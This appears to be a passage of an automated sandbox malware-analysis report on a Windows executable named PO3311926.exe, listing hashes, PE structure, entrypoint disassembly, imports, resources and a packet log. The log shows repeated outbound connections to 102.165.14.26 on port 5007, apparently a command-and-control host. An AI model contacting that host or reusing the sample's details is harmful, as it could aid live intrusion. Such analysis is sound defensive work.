Preview:	)]}'.["",["manor lords game","woman defrauded postal service","southwest airlines flights","nfl draft undrafted free agent signings","stardew valley 1.6 console update","spacex falcon 9 rocket launch","branching out hallmark movie cast","nyt strands hints"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"google:entityinfo":"Cg0vZy8xMWp2bjZ6eV82EgpWaWRlbyBnYW1lMrcQZGF0YTppbWFnZS9qcGVnO2Jhc2U2NCwvOWovNEFBUVNrWkpSZ0FCQVFBQUFRQUJBQUQvMndDRUFBa0dCd2dIQmdrSUJ3Z0tDZ2tMRFJZUERRd01EUnNVRlJBV0lCMGlJaUFkSHg4a0tEUXNKQ1l4Sng4ZkxUMHRNVFUzT2pvNkl5cy9SRDg0UXpRNU9qY0JDZ29LRFF3TkdnOFBHamNsSHlVM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOLy9BQUJFSUFFQUFRQU1CSWdBQ0VRRURFUUgveEFBYUFBQUNBd0VCQUFBQUFBQUFBQUFBQUFBRUJnTUZCd0lCLzhRQU1SQUFBZ0VEQXdNREFnVURCUUFBQUFBQUFRSURCQVVSQUJJaEV6RkJCbEdCSW5FVU1tR1JvU1BSNFFja00wSlMvOFFBR0FFQkFBTUJBQUFBQUFBQUFBQUFBQUFB

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Roaming\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1141
Entropy (8bit):	4.442398121585593
Encrypted:	false
SSDEEP:	24:zKLXkhDObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0hDQntKKH1MqJC
MD5:	6FB4D27A716A8851BC0505666E7C7A10
SHA1:	AD2A232C6E709223532C4D1AB892303273D8C814
SHA-256:	1DC36F296CE49BDF1D560B527DB06E1E9791C10263459A67EACE706C6DDCDEAE
SHA-512:	3192095C68C6B7AD94212B7BCA0563F2058BCE00C0C439B90F0E96EA2F029A37C2F2B69487591B494C1BA54697FE891E214582E392127CB8C90AB682E0D81ADB
Malicious:	false
Preview:	Microsoft (R) .NET Framework Services Installation Utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.730525092357605
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PO3311926.exe
File size:	948'030 bytes
MD5:	543e7940dd0ac8e9e42c0120515ec6b6
SHA1:	6dca4a5e851e1ccae98afba16d01a5f9b9553c59
SHA256:	c1bf9e8d217baf7a33931f25d96ff9eab4c24f9702beaa41a91bcab3745a1875
SHA512:	8d1523e5e585eff8a3868d6ece9e81a94df13a6bcebaa73d5d2b70e5ab1534dcd6a37449f9e796f060631bbfcb368512d75c5753ebb0052493790129a4b0fc96
SSDEEP:	24576:ETbBv5rUDQHX7JRUOYeQ6lm6eFGa6mPcyGJmK:2BzrJWOYeMMoGr
TLSH:	A4151202BEC19873C57208366A65A721B93DBE601F658EDF67C05A6CEE311C0D735BA3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

File Icon


Icon Hash:	1bbcedb3a94f2b96

Static PE Info

General

Entrypoint:	0x41f530
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	12e12319f1029ec4f8fcbed7e82df162

Entrypoint Preview

Instruction
call 00007F6090D5DD3Bh
jmp 00007F6090D5D64Dh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F6090D50497h
mov dword ptr [esi], 004356D0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004356D8h
mov dword ptr [ecx], 004356D0h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004356B8h
push eax
call 00007F6090D60ADFh
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007F6090D5D7DCh
push 0000000Ch
push esi
call 00007F6090D5CD99h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F6090D50412h
push 0043BEF0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F6090D60599h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F6090D5D758h
push 0043C0F4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F6090D6057Ch
int3
jmp 00007F6090D62017h
int3
int3
int3
int3
push 00422900h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3d070	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d0a4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0x18bb0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7d000	0x233c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b11c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x355f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c5ec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31bdc	0x31c00	2831bb8b11e3209658a53131886cdf98	False	0.5909380888819096	data	6.712962136932442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xaec0	0xb000	042f11346230ca5aa360727d9908e809	False	0.4579190340909091	data	5.261605615899847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x24720	0x1000	9670b581969e508258d8bc903025de5e	False	0.451416015625	data	4.387459135575936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x63000	0x190	0x200	c83554035c63bb446c6208d0c8fa0256	False	0.4453125	data	3.3327310103022305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x64000	0x18bb0	0x18c00	2fb7f9a83cae3a15f015d3bd8a628922	False	0.7813289141414141	data	7.131151833067016	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x7d000	0x233c	0x2400	40b5e17755fd6fdd34de06e5cdb7f711	False	0.7749565972222222	data	6.623012966548067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x64764	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x652ac	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x66858	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152			0.22073170731707317
RT_ICON	0x66ec0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512			0.33198924731182794
RT_ICON	0x671a8	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288			0.4016393442622951
RT_ICON	0x67390	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128			0.5168918918918919
RT_ICON	0x674b8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors			0.6098081023454158
RT_ICON	0x68360	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors			0.7418772563176895
RT_ICON	0x68c08	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors			0.7776497695852534
RT_ICON	0x692d0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors			0.4667630057803468
RT_ICON	0x69838	0xcb42	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.9983472345005189
RT_ICON	0x7637c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600			0.46763485477178424
RT_ICON	0x78924	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224			0.5293151969981238
RT_ICON	0x799cc	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400			0.589344262295082
RT_ICON	0x7a354	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088			0.5789007092198581
RT_DIALOG	0x7a7bc	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x7aa44	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x7ab80	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x7ac6c	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x7ad9c	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x7b0d4	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x7b328	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x7b50c	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x7b6d8	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x7b890	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x7b9d8	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0x7be44	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x7bfac	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x7c100	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x7c20c	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x7c2c8	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x7c3a0	0xbc	data			0.6170212765957447
RT_MANIFEST	0x7c45c	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 29, 2024 11:35:17.648221016 CEST	49676	443	192.168.2.8	52.182.143.211
Apr 29, 2024 11:35:18.679383039 CEST	49673	443	192.168.2.8	23.206.229.226
Apr 29, 2024 11:35:18.944973946 CEST	49672	443	192.168.2.8	23.206.229.226
Apr 29, 2024 11:35:22.460690022 CEST	49676	443	192.168.2.8	52.182.143.211
Apr 29, 2024 11:35:23.726267099 CEST	49671	443	192.168.2.8	204.79.197.203
Apr 29, 2024 11:35:28.288686991 CEST	49673	443	192.168.2.8	23.206.229.226
Apr 29, 2024 11:35:28.554414988 CEST	49672	443	192.168.2.8	23.206.229.226
Apr 29, 2024 11:35:29.954006910 CEST	443	49703	23.206.229.226	192.168.2.8
Apr 29, 2024 11:35:29.954231024 CEST	49703	443	192.168.2.8	23.206.229.226
Apr 29, 2024 11:35:32.070019960 CEST	49676	443	192.168.2.8	52.182.143.211
Apr 29, 2024 11:35:39.222980976 CEST	49705	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:35:39.223026991 CEST	443	49705	20.12.23.50	192.168.2.8
Apr 29, 2024 11:35:39.223086119 CEST	49705	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:35:39.225281954 CEST	49705	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:35:39.225296974 CEST	443	49705	20.12.23.50	192.168.2.8
Apr 29, 2024 11:35:39.658684969 CEST	443	49705	20.12.23.50	192.168.2.8
Apr 29, 2024 11:35:39.658821106 CEST	49705	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:35:39.661113977 CEST	49705	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:35:39.661128998 CEST	443	49705	20.12.23.50	192.168.2.8
Apr 29, 2024 11:35:39.661567926 CEST	443	49705	20.12.23.50	192.168.2.8
Apr 29, 2024 11:35:39.711060047 CEST	49705	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:35:39.763051033 CEST	49705	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:35:39.808118105 CEST	443	49705	20.12.23.50	192.168.2.8
Apr 29, 2024 11:35:40.049519062 CEST	443	49705	20.12.23.50	192.168.2.8
Apr 29, 2024 11:35:40.049602985 CEST	443	49705	20.12.23.50	192.168.2.8
Apr 29, 2024 11:35:40.049623013 CEST	443	49705	20.12.23.50	192.168.2.8
Apr 29, 2024 11:35:40.049662113 CEST	443	49705	20.12.23.50	192.168.2.8
Apr 29, 2024 11:35:40.049673080 CEST	49705	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:35:40.049699068 CEST	443	49705	20.12.23.50	192.168.2.8
Apr 29, 2024 11:35:40.049710989 CEST	49705	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:35:40.049715996 CEST	443	49705	20.12.23.50	192.168.2.8
Apr 29, 2024 11:35:40.049735069 CEST	49705	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:35:40.049762011 CEST	49705	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:35:40.049860954 CEST	443	49705	20.12.23.50	192.168.2.8
Apr 29, 2024 11:35:40.049926043 CEST	49705	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:35:40.049931049 CEST	443	49705	20.12.23.50	192.168.2.8
Apr 29, 2024 11:35:40.050074100 CEST	443	49705	20.12.23.50	192.168.2.8
Apr 29, 2024 11:35:40.050122023 CEST	49705	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:35:40.084739923 CEST	49705	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:35:40.084775925 CEST	443	49705	20.12.23.50	192.168.2.8
Apr 29, 2024 11:35:40.084788084 CEST	49705	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:35:40.084794998 CEST	443	49705	20.12.23.50	192.168.2.8
Apr 29, 2024 11:35:40.675695896 CEST	49703	443	192.168.2.8	23.206.229.226
Apr 29, 2024 11:35:40.675829887 CEST	49703	443	192.168.2.8	23.206.229.226
Apr 29, 2024 11:35:40.676470041 CEST	49707	443	192.168.2.8	23.206.229.226
Apr 29, 2024 11:35:40.676506996 CEST	443	49707	23.206.229.226	192.168.2.8
Apr 29, 2024 11:35:40.676711082 CEST	49707	443	192.168.2.8	23.206.229.226
Apr 29, 2024 11:35:40.677083969 CEST	49707	443	192.168.2.8	23.206.229.226
Apr 29, 2024 11:35:40.677099943 CEST	443	49707	23.206.229.226	192.168.2.8
Apr 29, 2024 11:35:40.835236073 CEST	443	49703	23.206.229.226	192.168.2.8
Apr 29, 2024 11:35:40.835256100 CEST	443	49703	23.206.229.226	192.168.2.8
Apr 29, 2024 11:35:41.015228033 CEST	443	49707	23.206.229.226	192.168.2.8
Apr 29, 2024 11:35:41.015316010 CEST	49707	443	192.168.2.8	23.206.229.226
Apr 29, 2024 11:35:51.004036903 CEST	49708	5007	192.168.2.8	102.165.14.26
Apr 29, 2024 11:35:52.007663012 CEST	49708	5007	192.168.2.8	102.165.14.26
Apr 29, 2024 11:35:54.007514000 CEST	49708	5007	192.168.2.8	102.165.14.26
Apr 29, 2024 11:35:58.007628918 CEST	49708	5007	192.168.2.8	102.165.14.26
Apr 29, 2024 11:36:00.187563896 CEST	443	49707	23.206.229.226	192.168.2.8
Apr 29, 2024 11:36:00.187680960 CEST	49707	443	192.168.2.8	23.206.229.226
Apr 29, 2024 11:36:06.023149967 CEST	49708	5007	192.168.2.8	102.165.14.26
Apr 29, 2024 11:36:13.138993979 CEST	49704	80	192.168.2.8	72.21.81.240
Apr 29, 2024 11:36:13.248476982 CEST	80	49704	72.21.81.240	192.168.2.8
Apr 29, 2024 11:36:13.248550892 CEST	49704	80	192.168.2.8	72.21.81.240
Apr 29, 2024 11:36:17.124152899 CEST	49709	5007	192.168.2.8	102.165.14.26
Apr 29, 2024 11:36:18.226330996 CEST	49709	5007	192.168.2.8	102.165.14.26
Apr 29, 2024 11:36:20.335688114 CEST	49709	5007	192.168.2.8	102.165.14.26
Apr 29, 2024 11:36:21.993531942 CEST	49710	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:36:21.993571997 CEST	443	49710	20.12.23.50	192.168.2.8
Apr 29, 2024 11:36:21.993638992 CEST	49710	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:36:21.994601965 CEST	49710	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:36:21.994616985 CEST	443	49710	20.12.23.50	192.168.2.8
Apr 29, 2024 11:36:22.412777901 CEST	443	49710	20.12.23.50	192.168.2.8
Apr 29, 2024 11:36:22.412961006 CEST	49710	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:36:22.442807913 CEST	49710	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:36:22.442832947 CEST	443	49710	20.12.23.50	192.168.2.8
Apr 29, 2024 11:36:22.443820953 CEST	443	49710	20.12.23.50	192.168.2.8
Apr 29, 2024 11:36:22.458940983 CEST	49710	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:36:22.504122019 CEST	443	49710	20.12.23.50	192.168.2.8
Apr 29, 2024 11:36:22.814457893 CEST	443	49710	20.12.23.50	192.168.2.8
Apr 29, 2024 11:36:22.814517021 CEST	443	49710	20.12.23.50	192.168.2.8
Apr 29, 2024 11:36:22.814562082 CEST	443	49710	20.12.23.50	192.168.2.8
Apr 29, 2024 11:36:22.814594030 CEST	49710	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:36:22.814608097 CEST	443	49710	20.12.23.50	192.168.2.8
Apr 29, 2024 11:36:22.814626932 CEST	49710	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:36:22.814704895 CEST	49710	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:36:22.814765930 CEST	443	49710	20.12.23.50	192.168.2.8
Apr 29, 2024 11:36:22.814841986 CEST	443	49710	20.12.23.50	192.168.2.8
Apr 29, 2024 11:36:22.814870119 CEST	49710	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:36:22.814877033 CEST	443	49710	20.12.23.50	192.168.2.8
Apr 29, 2024 11:36:22.814944029 CEST	49710	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:36:22.815020084 CEST	443	49710	20.12.23.50	192.168.2.8
Apr 29, 2024 11:36:22.815063953 CEST	49710	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:36:22.818269014 CEST	49710	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:36:22.818269014 CEST	49710	443	192.168.2.8	20.12.23.50
Apr 29, 2024 11:36:22.818289995 CEST	443	49710	20.12.23.50	192.168.2.8
Apr 29, 2024 11:36:22.818300009 CEST	443	49710	20.12.23.50	192.168.2.8
Apr 29, 2024 11:36:24.351315975 CEST	49709	5007	192.168.2.8	102.165.14.26
Apr 29, 2024 11:36:32.476262093 CEST	49709	5007	192.168.2.8	102.165.14.26
Apr 29, 2024 11:36:36.156661987 CEST	49712	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:36.156702995 CEST	443	49712	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:36.156856060 CEST	49712	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:36.157217979 CEST	49713	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:36.157263994 CEST	443	49713	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:36.157325029 CEST	49713	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:36.157450914 CEST	49714	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:36.157500982 CEST	443	49714	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:36.157738924 CEST	49714	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:36.157954931 CEST	49715	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:36.157989025 CEST	443	49715	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:36.158040047 CEST	49715	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.478931904 CEST	49720	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.478940010 CEST	443	49720	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.478981972 CEST	49720	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.486918926 CEST	49715	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.486938000 CEST	443	49715	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.487302065 CEST	49714	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.487313986 CEST	443	49714	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.487711906 CEST	49713	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.487726927 CEST	443	49713	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.487972975 CEST	49712	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.487996101 CEST	443	49712	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.489847898 CEST	49720	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.489861012 CEST	443	49720	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.730360031 CEST	443	49714	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.730732918 CEST	443	49712	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.730942011 CEST	443	49713	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.732534885 CEST	443	49715	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.734124899 CEST	443	49720	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.743957996 CEST	49714	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.743967056 CEST	443	49714	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.744210005 CEST	49712	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.744225025 CEST	443	49712	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.744323015 CEST	49713	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.744333029 CEST	443	49713	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.744429111 CEST	49715	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.744441986 CEST	443	49715	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.744568110 CEST	49720	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.744575024 CEST	443	49720	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.745083094 CEST	443	49714	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.745162010 CEST	49714	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.745318890 CEST	443	49712	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.745383024 CEST	49712	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.745718002 CEST	443	49713	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.745774984 CEST	49713	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.746157885 CEST	443	49720	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.746190071 CEST	443	49715	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.746217012 CEST	49720	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.746253967 CEST	49715	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.758506060 CEST	49714	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.758575916 CEST	443	49714	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.761790991 CEST	49712	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.761861086 CEST	443	49712	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.762780905 CEST	49713	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.762944937 CEST	443	49713	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.765099049 CEST	49715	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.765348911 CEST	443	49715	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.767890930 CEST	49720	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.767983913 CEST	443	49720	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.770694017 CEST	49714	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.770704031 CEST	443	49714	142.250.191.196	192.168.2.8
